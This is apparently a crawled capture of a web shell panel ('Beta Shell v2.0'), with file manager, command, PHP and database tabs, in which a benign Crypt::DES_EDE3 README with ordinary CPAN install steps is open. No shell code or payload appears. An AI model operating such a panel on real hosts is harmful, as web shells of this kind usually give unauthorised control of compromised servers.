Beta Shell
v2.0 ยท web2.us.cloudlogin.co
[FM]
[CMD]
[PHP]
[DB]
[INFO]
[SEC]
File Manager
~
/
usr
/
share
/
doc
/
perl-Crypt-DES_EDE3
Upload
4 items
Name
Size
Perms
Modified
Actions
[ .. / .. ]
Changes
204 B
-rw-r--r--
2001-09-15 03:41:51
Edit
Del
README
717 B
-rw-r--r--
2001-09-15 03:24:02
Edit
Del
Editing: README
(717 B)
Path: /usr/share/doc/perl-Crypt-DES_EDE3/README
Back
$Id: README,v 1.1.1.1 2001/09/15 03:24:02 btrott Exp $ This is Crypt::DES_EDE3, a module implementing Triple-DES EDE (encrypt-decrypt-encrypt) encryption and decryption. PREREQUISITES * Crypt::DES INSTALLATION Crypt::DES_EDE3 installation is straightforward. If your cpan shell is set up, you should just be able to do % perl -MCPAN -e 'install Crypt::DES_EDE3' If you don't like that, you can download the distribution; the latest version on CPAN can be found in ftp://ftp.cpan.org/pub/CPAN/authors/id/B/BT/BTROTT/ Download it, unpack it, then build it as per the usual: % perl Makefile.PL % make && make test Then install it: % make install Benjamin Trott / ben@rhumba.pair.com